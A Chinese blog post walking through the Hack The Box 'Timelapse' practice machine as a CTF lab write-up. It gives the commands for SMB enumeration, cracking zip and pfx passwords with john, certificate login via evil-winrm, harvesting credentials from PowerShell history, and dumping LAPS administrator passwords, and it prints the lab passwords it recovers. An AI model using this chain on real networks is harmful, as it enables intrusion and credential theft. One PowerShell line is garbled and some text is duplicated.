Hack The Box,一款有意思的渗透测试平台

最新推荐文章于 2025-05-20 00:19:48 发布
最新推荐文章于 2025-05-20 00:19:48 发布
阅读量1.7k 收藏 3
点赞数 1
CC 4.0 BY-SA版权
文章标签: 网络 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/text2203/article/details/128861439

前言

Hack The
Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中一些模拟真实场景,其中一些更倾向于CTF风格的挑战。

Hack The Box还提供了Rank机制来作为我们挑战的动力,通过通关靶场来去获取积分提高自己的排名。

如何开始

在注册好账号之后,我们需要去下载两个连接文件。在自己的home页面的右上角有一个Connect to HTB。

1661766347_630c8acb6dfe37b46040e.png!small?1661766351023

需要申请这两个连接文件,具体操作参考:[HTB连接](https://blog.csdn.net/zr1213159840/article/details/123489915?ops_request_misc=&request_id=&biz_id=102&utm_term=hacktheboxvpn%E8%BF%9E%E6%8E%A5&utm_medium=distribute.pc_search_result.none-
task-
blog-2allsobaiduweb~default-0-123489915.142%5Ev42%5Epc_ran_alice,185%5Ev2%5Econtrol&spm=1018.2226.3001.4187)

正题:Timelapse靶场

连接

这是我的两个连接文件,

1661766857_630c8cc9843d0189face9.png!small?1661766860824

利用kali自带的工具进行连接

1661771759_630c9fefab61bfb484115.png!small?1661771762955

1661771775_630c9fff5c2dc947bb707.png!small?1661771778623

1661767210_630c8e2abe69a8405efde.png!small?1661767214068

连接成功。

启动靶场

选择好靶机后,点击Join Machine就能启动靶机,靶机会提供一个IP。

1661767502_630c8f4e8b9510d4e7bcc.png!small?1661767505821

开始测试

靶机IP:10.10.11.152

连通性测试

ping 10.10.11.152

端口扫描

nmap -sC -sV -oN myscan.txt 10.10.11.152

通过端口扫描发现,主机开放了一下端口,

1661767876_630c90c46f99e377d9d6b.png!small?1661767879951

查看smb共享,

smbclient -L 10.10.11.152

存在如下共享目录,

1661768103_630c91a7d29902691654d.png!small?1661768107443

在Share的Dev目录下发现一个压缩包,

1661768231_630c9227c55d4200e61bd.png!small?1661768235159

获取压缩包文件(获取可能会失败,多尝试几次),

解压时发现需要解压密码,

利用zip2john进行解密,

提取压缩包的hash值,

zip2john winrm_backup.zip >> hash

利用字典进行爆破,

john --wordlist=/home/Password-Top1000(1010).txt hash

爆破出密码为:supremelegacy。

解压出来的文件还需要密码才能访问,

之前爆破出来的密码不正确不能访问,

pfx文件是经过秘钥加密的,我们可以使用命令openssl进行分析,并且要同时使用pkcs12文件工具,生成和分析pkcs12文件,

导出pfx文件的hash,

pfx2john legacyy_dev_auth.pfx >pfx_hash

再次利用john爆破密码,

john --wordlist=/home/PassWord.txt pfx_hash

密码为:thuglegacy

发现这是个私钥文件,

1661768785_630c945106b7ed4ffe693.png!small?1661768788303

利用openssl进行生成,三个密码都是我们之前生成的得到的thuglegacy,得到了私钥文件。

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key

得到私钥文件,还需要生成证书,

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt

在开头信息收集的时候看到了开启了5986端口,这个端口是用于横向渗透的端口,可以使用命令evil-winrm进行连接。

利用生成的私钥文件和证书进行登陆,

evil-winrm -i 10.10.11.152 -S -c cert.crt -k prv.key -p -u

登陆密码为我们前面设置的密码,

1661769165_630c95cd072bd938fe894.png!small?1661769168832

成功找到user.txt文件,

1661769216_630c9600062952508f2f9.png!small?1661769219376

这样就拿到了userown了,但是目标是要拿到systemown,就需要进行提取。

提权

上传提权文件

upload /home/winPEASx64.exe

[下载地址](https://github.com/carlospolop/PEASS-
ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe)

1661770425_630c9ab9eeb23bd2d988b.png!small?1661770429392

运行该文件

找到一个历史文件

1661770625_630c9b81cb615ecc7a2ab.png!small?1661770629217

下载该文件

download
C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

查看文件内容

找到一个用户和密码

使用该用户凭证

$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
p = C o n v e r t T o − S e c u r e S t r i n g ′ E 3 R p = ConvertTo-SecureString 'E3R p=ConvertToSecureStringE3RQ62^12p7PLlC%KWaxuaV’ -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential (‘svc_deploy’, $p)

传递命令

Evil-WinRM PS C:\Users> invoke-command -computername localhost -credential
$c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\svc_deploy
Evil-WinRM PS C:\Users> invoke-command -computername localhost -credential
$c -port 5986 -usessl -SessionOption $so -scriptblock {hostname}
dc01

抓取用户凭证

使用AD-Module,查看 LAPS 密码

invoke-command -computername localhost -credential $c -port 5986 -usessl
-SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-
Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime}

成功获取到administrator的密码。

尝试登陆

evil-winrm -i 10.10.11.152 -S -u ‘administrator’ -p
‘z+&4Olgpgn;,11t5XbE#x0,2’

成功登陆。

最终在rtx用户的桌面找到root.txt获得系统拥有权。

后记

作为一个刚入行的小白,第一次发表文章,求大佬们多多指点!

inistrator的密码。

尝试登陆

evil-winrm -i 10.10.11.152 -S -u ‘administrator’ -p
‘z+&4Olgpgn;,11t5XbE#x0,2’

成功登陆。

最终在rtx用户的桌面找到root.txt获得系统拥有权。

最后

分享一个快速学习【网络安全】的方法,「也许是」最全面的学习方法:
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

在这里插入图片描述

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k。

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

想要入坑黑客&网络安全的朋友,给大家准备了一份:282G全网最全的网络安全资料包免费领取!
扫下方二维码,免费领取

有了这些基础,如果你要深入学习,可以参考下方这个超详细学习路线图,按照这个路线学习,完全够支撑你成为一名优秀的中高级网络安全工程师:

高清学习路线图或XMIND文件(点击下载原文件)

还有一些学习中收集的视频、文档资源,有需要的可以自取:
每个成长路线对应板块的配套视频:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

因篇幅有限,仅展示部分资料,需要的可以【扫下方二维码免费领取】

AIGC阿道夫
关注
[网络安全自学篇] 三十七.Web渗透提高班之hack the box在线靶场注册及入门知识
杨秀璋的专栏
01-09 2万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,而且用户注册该网站时需要绕过关卡并获取邀请码,涉及审查元素、base64解密、发送post请求等操作,挺有意思的。这是一篇基础性文章,将讲述注册过程、遇到的难点及入门案例,希望对您有所帮助。
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
Hack The Box——ServMon
江左盟的博客
06-19 953
简介 信息收集 使用 漏洞发现 漏洞利用 权限提升 总结
Hackthebox------Jerry
大方子
11-24 3148
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
Hack The Box (HTB) Battlegrounds - Cyber Mayhem 入门教程【新手向】
最新发布
vortex5的博客
05-20 844
Cyber Mayhem 是 Hack The Box Battlegrounds 平台上的一种多人实时攻防竞赛模式。两支队伍(每队 1、2 或 4 名玩家)被分配相同的虚拟机。防守:通过修补漏洞保护自己的虚拟机。进攻:利用对手虚拟机的漏洞,获取用户和 root 旗帜(flags)。目标是控制对手的机器账户(用户和系统)以得分,同时保持对自己机器的控制。比赛有时间限制,通常持续数小时,最短 15 分钟后才可投降。Cyber Mayhem 是一个充满挑战且回报丰厚的模式,融合了进攻和防守技能。
Hack The Box——Luanne
江左盟的博客
12-06 1万+
目录 简介 信息收集 漏洞发现 Lua代码注入 漏洞利用 权限提升 用户r.michaels的Shell 总结 简介 靶机偏CTF类型,评分才2.3,评分这么低是有原因的。总体思路是通过lua代码注入获得WebShell,然后利用CVE-2010-2320读取普通用户ssh私钥文件,从而获得普通用户权限,最后通过解密enc文件,利用.htpasswd文件中的密码获得root权限。 信息收集 使用Nmap对目标主机进行端口扫描及服务识别,发现目标主机开启22、80和9001端口,且80
HackTheBox-Jeeves
网安星空
01-10 559
HackTheBox 网站CTF靶场PWN相关题目Jeeves,主要知识点为缓冲区溢出
Hack The Box——SneakyMailer
江左盟的博客
08-18 1万+
简介 信息收集 漏洞发现 漏洞利用 权限提升 总结
Hack The Box - STARTING POINT
小小郭的博客
03-06 2651
Hack The Box - STARTING POINT
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
WEB渗透测试平台
07-06
链接:https://pan.baidu.com/s/1QFrJeL6tq5iaf8AfXxYJCw 提取码:dm1v 自己集成的测试平台,供同行使用。集成的平台所有权归原作者所有,致以感谢。 包括: 技术参考 OWASP sql注入资料 w3schoo/runoob/linux等网站 metasploit TCP/IP等学习和参考资料。 集成平台 DVWA multilidae MCIR sqli-labs pikachu BWVS btslab xssplatform phpMyAdmin blueLotus 推荐书籍 各种参考详细书目。 因涉及产权以上仅提供WEB测试平台,书籍不提供。 有问题请留言。
Hack The Box 是一个非常受欢迎的在线平台,主要面向网络安全爱好者、专业渗透测试人员以及希望提升自己在网络安全领域技能
06-22
Hack The Box 是一个非常受欢迎的在线平台,主要面向网络安全爱好者、专业渗透测试人员以及希望提升自己在网络安全领域技能的学生。它提供了一个安全且合法的环境,让参与者能够实践他们的黑客技能,而不必担心法律后果。 平台的核心功能包括: 虚拟靶场: Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到的各种系统配置和安全漏洞。 参与者需要利用自己的知识和工具来破解这些虚拟机,找到所谓的“flag”(通常是文本文件),并提交到平台上以获得积分。 学习资源: 平台上有丰富的学习材料,包括文章、教程和论坛讨论,帮助用户理解各种网络安全概念和技术。 用户可以分享自己的“write-up”,即解决问题的步骤和技巧,这有助于社区成员之间的知识共享。 排行榜和成就系统: 解决虚拟机上的挑战会获得积分,这些积分决定了用户在平台上的排名。 成就系统鼓励用户完成特定任务,如连续登录或完成特定难度的虚拟机。 社区和交流: Hack The Box 拥有一个活跃的社区,成员们可以在论坛、聊天室或通过平台的其他社交功能进行交流。
入坑 Hack The Box
LainWith的博客
10-19 2万+
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
Hack The Box——ScriptKiddie
江左盟的博客
02-15 1万+
简介 信息收集 使用nmap扫描目标主机端口及服务信息,发现5000端口运行着Werkzeug httpd 0.16.1 (Python 3.8.5)服务,操作系统为Ubuntu,如图: 访问5000端口发现是简单的黑客工具页面,如图: 使用Google搜索发现Werkzeug Debug Shell远程代码执行漏洞,但是该靶机并不适用。使用该页面的nmap扫描127.0.0.1,发现目标主机运行Nmap 7.80版本,如图: 使用Google和exploit-db搜索该版本漏洞.
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
Hack The Box——OpenKeyS
江左盟的博客
08-22 1万+
目录 简介 信息收集 漏洞发现 登录绕过 漏洞利用 权限提升 总结 简介 靶机比较简单,通过目录扫描发现swp文件,分析文件发现auth.php源码和用户名,然后利用CVE-2019-19521绕过登录,接着伪造Cookie获取用户的SSH私钥,利用该文件登录目标主机,最后利用CVE-2019-19520/CVE-2019-19522成功提升至root权限。 信息收集 使用nmap快速扫描目标主机开放的端口和运行的服务,发现开启22和80端口,分别运行OpenSSH 8.1和OpenB
Hack The Box——Feline
江左盟的博客
03-30 1万+
简介 信息收集 nmap 访问
Nibbles - Hack the box
neal1991的专栏
03-17 552
IntroductionTarget: 10.10.10.75(OS: Linux) Kali linux: 10.10.16.44Information Enumera...
掌握Hack The Box:深入学习渗透测试技巧
Hack The Box (HTB) 是一个在线平台,提供了一个合法、安全的环境,供信息安全爱好者进行渗透测试的实践和学习。通过解决各种挑战和攻破虚拟机,用户可以提升自己的网络安全技能。 2. 渗透测试基础 渗透测试通常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值